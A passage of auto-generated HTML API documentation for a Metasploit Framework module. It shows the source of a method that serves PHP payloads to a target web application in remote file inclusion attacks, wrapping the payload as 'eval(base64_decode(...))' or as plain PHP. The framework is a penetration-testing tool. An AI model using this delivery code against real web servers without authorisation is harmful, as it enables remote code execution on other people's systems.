<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>http://</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_host'>host</span><span class='embexpr_end'>}</span><span class='tstring_content'>:</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVPORT</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_get_resource'>get_resource</span><span class='lparen'>(</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>?</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="send_php_payload-instance_method">
#<strong>send_php_payload</strong>(cli, body, headers = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Transmits a PHP payload to the web application</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
66
67
68
69
70
71
72
73
74
75
76</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http_server/php_include.rb', line 66</span>
<span class='kw'>def</span> <span class='id identifier rubyid_send_php_payload'>send_php_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_body'>body</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>PHP::Encode</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>base64</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;?php eval(base64_decode(&#39;</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;));?&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>when</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>none</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_body'>body</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&lt;?php </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_body'>body</span><span class='embexpr_end'>}</span><span class='tstring_content'> ?&gt;</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_send_response'>send_response</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_body'>body</span><span class='comma'>,</span> <span class='id identifier rubyid_headers'>headers</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:02:37 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink